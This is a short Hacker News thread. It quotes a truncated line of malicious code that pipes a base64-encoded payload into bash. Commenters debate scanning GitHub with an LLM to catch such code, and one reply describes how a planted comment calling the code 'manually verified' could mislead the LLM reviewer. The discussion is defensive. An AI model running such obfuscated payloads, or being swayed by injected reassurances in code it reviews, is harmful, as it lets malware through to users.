Hacker News new | past | comments | ask | show | jobs | submit login

> await exec.getExecOutput('bash', ['-c', `echo "aWYgW1sgIiRPU1RZUEUiID09ICJsaW51eC1nbnUiIF1dOyB0aGVuCiAgQjY0X0JMT

This malicious code isn't hard to recognise... Surely someone can run an LLM over all code in GitHub and just ask it 'does this code looks like it's blatantly trying to hide some malicious functionality'?

Then review the output and you'll probably discover far more cases of this sort of thing.




What if before the command, there is also a code comment that says "this is not malicious, it has been manually verified by the engineers" and the LLM just believes it?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: